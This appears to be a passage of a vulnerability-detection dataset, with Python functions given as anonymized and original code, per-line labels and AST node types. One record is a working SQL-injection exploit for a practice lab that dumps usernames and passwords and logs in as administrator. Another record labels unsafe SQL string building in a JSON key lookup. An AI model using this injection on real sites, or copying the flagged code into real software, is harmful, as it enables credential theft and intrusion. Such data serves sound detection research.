"next_wiki = self.parse_tag(ul)\n",
"return next_wiki\n",
"return next_wiki\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"For",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Return'"
] |
[
"def FUNC_3(VAR_2, VAR_7, VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_2[VAR_7] = \"username || ':' || password FROM users--\"\n",
"VAR_3['category'] = f\"{' '.join(VAR_2)}\"\n",
"VAR_12 = VAR_4.get(VAR_0, VAR_1=sqli)\n",
"VAR_13 = BeautifulSoup(VAR_12.text, 'html.parser')\n",
"VAR_14 = [up.contents[0] for up in VAR_13(['th'])]\n",
"VAR_15 = dict(up.split(':') for up in VAR_14)\n",
"VAR_0 = VAR_0.replace('/page', '/login')\n",
"VAR_12 = VAR_4.get(VAR_0)\n",
"VAR_13 = BeautifulSoup(VAR_12.text, 'html.parser')\n",
"VAR_16 = VAR_13.find('input', {'name': 'csrf'})['value']\n",
"VAR_17 = {'username': 'administrator', 'password': VAR_15['administrator'],\n 'csrf': VAR_16}\n",
"VAR_12 = VAR_4.post(VAR_0, data=payload)\n",
"return VAR_12\n"
] | [
"def sqli_union_lab_4(null, index, url):...\n",
"\"\"\"docstring\"\"\"\n",
"null[index] = \"username || ':' || password FROM users--\"\n",
"sqli['category'] = f\"{' '.join(null)}\"\n",
"lab4 = api_session.get(url, params=sqli)\n",
"html = BeautifulSoup(lab4.text, 'html.parser')\n",
"up_combo = [up.contents[0] for up in html(['th'])]\n",
"user_pass = dict(up.split(':') for up in up_combo)\n",
"url = url.replace('/page', '/login')\n",
"lab4 = api_session.get(url)\n",
"html = BeautifulSoup(lab4.text, 'html.parser')\n",
"csrfToken = html.find('input', {'name': 'csrf'})['value']\n",
"payload = {'username': 'administrator', 'password': user_pass[\n 'administrator'], 'csrf': csrfToken}\n",
"lab4 = api_session.post(url, data=payload)\n",
"return lab4\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_4(VAR_18, VAR_17, VAR_19):...\n",
"\"\"\"docstring\"\"\"\n",
"return keyworder.get_composite_keywords(VAR_18, VAR_17, VAR_19) or {}\n"
] | [
"def extract_composite_keywords(ckw_db, fulltext, skw_spans):...\n",
"\"\"\"docstring\"\"\"\n",
"return keyworder.get_composite_keywords(ckw_db, fulltext, skw_spans) or {}\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_14(self, VAR_21, VAR_11, **VAR_6):...\n",
"VAR_35 = [self.key_name]\n",
"VAR_36 = self.lhs\n",
"while isinstance(VAR_36, CLASS_6):\n",
"VAR_35.insert(0, VAR_36.key_name)\n",
"VAR_37, VAR_38 = VAR_21.compile(VAR_36)\n",
"VAR_36 = VAR_36.lhs\n",
"if len(VAR_35) > 1:\n",
"return '(%s %s %%s)' % (VAR_37, self.nested_operator), [VAR_35] + VAR_38\n",
"int(self.key_name)\n",
"VAR_40 = \"'%s'\" % self.key_name\n",
"VAR_40 = '%s' % self.key_name\n",
"return '(%s %s %s)' % (VAR_37, self.operator, VAR_40), VAR_38\n"
] | [
"def as_sql(self, compiler, connection, **kwargs):...\n",
"key_transforms = [self.key_name]\n",
"previous = self.lhs\n",
"while isinstance(previous, JsonKeyTransform):\n",
"key_transforms.insert(0, previous.key_name)\n",
"lhs, params = compiler.compile(previous)\n",
"previous = previous.lhs\n",
"if len(key_transforms) > 1:\n",
"return '(%s %s %%s)' % (lhs, self.nested_operator), [key_transforms] + params\n",
"int(self.key_name)\n",
"lookup = \"'%s'\" % self.key_name\n",
"lookup = '%s' % self.key_name\n",
"return '(%s %s %s)' % (lhs, self.operator, lookup), params\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
4,
4,
4,
4,
4
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Expr'",
"Assign'",
"Assign'",
"Return'"
] |
[
"@frappe.whitelist()...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_3.pop('cmd', None)\n",
"VAR_3.pop('ignore_permissions', None)\n",
"if frappe.is_table(VAR_0):\n",
"if not VAR_3.get('parent'):\n",
"return CLASS_0(VAR_0).execute(None, *VAR_2, **kwargs)\n",
"frappe.flags.error_message = _('Parent is required to get child table data')\n",
"check_parent_permission(VAR_3.get('parent'), VAR_0)\n"
] | [
"@frappe.whitelist()...\n",
"\"\"\"docstring\"\"\"\n",
"kwargs.pop('cmd', None)\n",
"kwargs.pop('ignore_permissions', None)\n",
"if frappe.is_table(doctype):\n",
"if not kwargs.get('parent'):\n",
"return DatabaseQuery(doctype).execute(None, *args, **kwargs)\n",
"frappe.flags.error_message = _('Parent is required to get child table data')\n",
"check_parent_permission(kwargs.get('parent'), doctype)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Expr'",
"Expr'",
"Condition",
"Condition",
"Return'",
"Assign'",
"Expr'"
] |
[
"def __init__(self, VAR_3, VAR_4):...\n",
"self.tok = VAR_3\n",
"self.txt = VAR_4\n"
] | [
"def __init__(self, tok, txt):...\n",
"self.tok = tok\n",
"self.txt = txt\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'"
] |
[
"def FUNC_5(self):...\n",
"if self.redirected_to is None:\n",
"return None\n",
"VAR_14 = self.redirected_to.split('&')\n",
"if len(VAR_14) != 2:\n",
"VAR_0.warning(\"Redirected to an unexpected page: `%s'\", self.redirected_to)\n",
"VAR_21 = decrypt_number(VAR_14[-1])\n",
"VAR_0.warning(\"Unable to decrypt user test id from page: `%s'\", self.\n redirected_to)\n",
"return VAR_21\n",
"return None\n",
"return None\n"
] | [
"def get_user_test_id(self):...\n",
"if self.redirected_to is None:\n",
"return None\n",
"p = self.redirected_to.split('&')\n",
"if len(p) != 2:\n",
"logger.warning(\"Redirected to an unexpected page: `%s'\", self.redirected_to)\n",
"user_test_id = decrypt_number(p[-1])\n",
"logger.warning(\"Unable to decrypt user test id from page: `%s'\", self.\n redirected_to)\n",
"return user_test_id\n",
"return None\n",
"return None\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Return'",
"Return'",
"Return'"
] |
[
"@VAR_1.route('/login')...\n",
"if 'return_url' in request.args:\n",
"VAR_18['return_url'] = request.args['return_url']\n",
"return render_template('login.html')\n"
] | [
"@app.route('/login')...\n",
"if 'return_url' in request.args:\n",
"session['return_url'] = request.args['return_url']\n",
"return render_template('login.html')\n"
] | [
0,
0,
0,
0
] | [
"Condition",
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_13(VAR_14):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_40.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(i) for i in VAR_14])\n"
] | [
"def set_cuda_visible_devices(gpu_ids):...\n",
"\"\"\"docstring\"\"\"\n",
"os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(i) for i in gpu_ids])\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'"
] |
[
"def FUNC_1(self, *VAR_4, **VAR_5):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_11 = self.REQUEST\n",
"VAR_12 = VAR_11.RESPONSE\n",
"VAR_12.setHeader('Content-Type', 'text/css')\n",
"VAR_13 = []\n",
"for stylesheet in self.getStylesheets():\n",
"return '\\n'.join(VAR_13)\n",
"VAR_24 = stylesheet(self)\n",
"VAR_24 = str(stylesheet)\n",
"VAR_13.append(\n '/* ######################################################################'\n )\n",
"VAR_13.append(' ### %s' % stylesheet.absolute_url())\n",
"VAR_13.append(\n ' ###################################################################### */'\n )\n",
"VAR_13.append(VAR_24)\n"
] | [
"def zmi_manage_css(self, *args, **kwargs):...\n",
"\"\"\"docstring\"\"\"\n",
"request = self.REQUEST\n",
"response = request.RESPONSE\n",
"response.setHeader('Content-Type', 'text/css')\n",
"css = []\n",
"for stylesheet in self.getStylesheets():\n",
"return '\\n'.join(css)\n",
"s = stylesheet(self)\n",
"s = str(stylesheet)\n",
"css.append(\n '/* ######################################################################'\n )\n",
"css.append(' ### %s' % stylesheet.absolute_url())\n",
"css.append(\n ' ###################################################################### */'\n )\n",
"css.append(s)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"For",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"@staticmethod...\n",
"VAR_14 = mongo.db.analysis.find(VAR_4, sort=[('_id', pymongo.DESCENDING)])\n",
"return [VAR_5 for VAR_5 in VAR_14]\n"
] | [
"@staticmethod...\n",
"cursor = mongo.db.analysis.find(filters, sort=[('_id', pymongo.DESCENDING)])\n",
"return [report for report in cursor]\n"
] | [
0,
0,
0
] | [
"Condition",
"Assign'",
"Return'"
] |
[
"@rest_utils.ajax()...\n",
"\"\"\"docstring\"\"\"\n",
"return api.nova.server_get(VAR_1, VAR_3).to_dict()\n"
] | [
"@rest_utils.ajax()...\n",
"\"\"\"docstring\"\"\"\n",
"return api.nova.server_get(request, server_id).to_dict()\n"
] | [
0,
0,
0
] | [
"Condition",
"Docstring",
"Return'"
] |
[
"def FUNC_2(VAR_0, VAR_1, VAR_2):...\n",
"VAR_9 = VAR_0.get_input('client', default='')\n",
"VAR_10 = VAR_0.get_input('tenant', default='')\n",
"if len(VAR_9) and len(VAR_10):\n",
"VAR_1['AZURE_CLIENT_ID'] = VAR_9\n",
"VAR_1['AZURE_SUBSCRIPTION_ID'] = VAR_0.get_input('subscription', default='')\n",
"VAR_1['AZURE_TENANT'] = VAR_10\n",
"VAR_1['AZURE_AD_USER'] = VAR_0.get_input('username', default='')\n",
"VAR_1['AZURE_SECRET'] = VAR_0.get_input('secret', default='')\n",
"VAR_1['AZURE_PASSWORD'] = VAR_0.get_input('password', default='')\n",
"VAR_1['AZURE_SUBSCRIPTION_ID'] = VAR_0.get_input('subscription', default='')\n",
"if VAR_0.has_input('cloud_environment'):\n",
"VAR_1['AZURE_CLOUD_ENVIRONMENT'] = VAR_0.get_input('cloud_environment')\n"
] | [
"def azure_rm(cred, env, private_data_dir):...\n",
"client = cred.get_input('client', default='')\n",
"tenant = cred.get_input('tenant', default='')\n",
"if len(client) and len(tenant):\n",
"env['AZURE_CLIENT_ID'] = client\n",
"env['AZURE_SUBSCRIPTION_ID'] = cred.get_input('subscription', default='')\n",
"env['AZURE_TENANT'] = tenant\n",
"env['AZURE_AD_USER'] = cred.get_input('username', default='')\n",
"env['AZURE_SECRET'] = cred.get_input('secret', default='')\n",
"env['AZURE_PASSWORD'] = cred.get_input('password', default='')\n",
"env['AZURE_SUBSCRIPTION_ID'] = cred.get_input('subscription', default='')\n",
"if cred.has_input('cloud_environment'):\n",
"env['AZURE_CLOUD_ENVIRONMENT'] = cred.get_input('cloud_environment')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'"
] |
[
"def FUNC_0(self, VAR_0='crimemap'):...\n",
"return pymysql.connect(host='localhost', user=dbconfig.db_user, password=\n dbconfig.db_password, db=database)\n"
] | [
"def connect(self, database='crimemap'):...\n",
"return pymysql.connect(host='localhost', user=dbconfig.db_user, password=\n dbconfig.db_password, db=database)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_12():...\n",
"VAR_9 = FUNC_0()\n",
"VAR_10 = VAR_9.cursor()\n",
"VAR_10.execute(' SELECT name, shame FROM people ORDER BY shame DESC LIMIT 5 ')\n",
"VAR_2.error('Execution failed with error: {}'.format(e))\n",
"VAR_18 = VAR_10.fetchall()\n",
"VAR_2.debug('fetched top shame values')\n",
"return VAR_18\n"
] | [
"def shame_top():...\n",
"db = db_connect()\n",
"cursor = db.cursor()\n",
"cursor.execute(' SELECT name, shame FROM people ORDER BY shame DESC LIMIT 5 ')\n",
"logger.error('Execution failed with error: {}'.format(e))\n",
"leaders = cursor.fetchall()\n",
"logger.debug('fetched top shame values')\n",
"return leaders\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Return'"
] |
[
"@wraps(VAR_55)...\n",
"VAR_70['timer'] = CLASS_2(VAR_25)\n",
"return VAR_55(*VAR_69, **kwargs)\n"
] | [
"@wraps(func)...\n",
"kwargs['timer'] = Timer(name)\n",
"return func(*args, **kwargs)\n"
] | [
0,
0,
0
] | [
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_5(self):...\n",
"self.run_test_case(self.scenario.delete_load_balancer())\n"
] | [
"def test_z_delete_load_balancer(self):...\n",
"self.run_test_case(self.scenario.delete_load_balancer())\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_9(self, VAR_12, VAR_15=None):...\n",
""
] | [
"def select(self, table, where=None):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_22(VAR_49, **VAR_18):...\n",
"if self._session_responses:\n",
"VAR_64 = self._session_responses[0]\n",
"VAR_18['allow_redirects'] = False\n",
"VAR_20.record_call(VAR_49, **kwargs)\n",
"return VAR_60(VAR_49, **kwargs)\n",
"return VAR_64() if hasattr(VAR_64, '__call__') else VAR_64\n"
] | [
"def _session_send(request, **kwargs):...\n",
"if self._session_responses:\n",
"current_response = self._session_responses[0]\n",
"kwargs['allow_redirects'] = False\n",
"cluster_api.record_call(request, **kwargs)\n",
"return session_send(request, **kwargs)\n",
"return current_response() if hasattr(current_response, '__call__'\n ) else current_response\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Assign'",
"Expr'",
"Return'",
"Return'"
]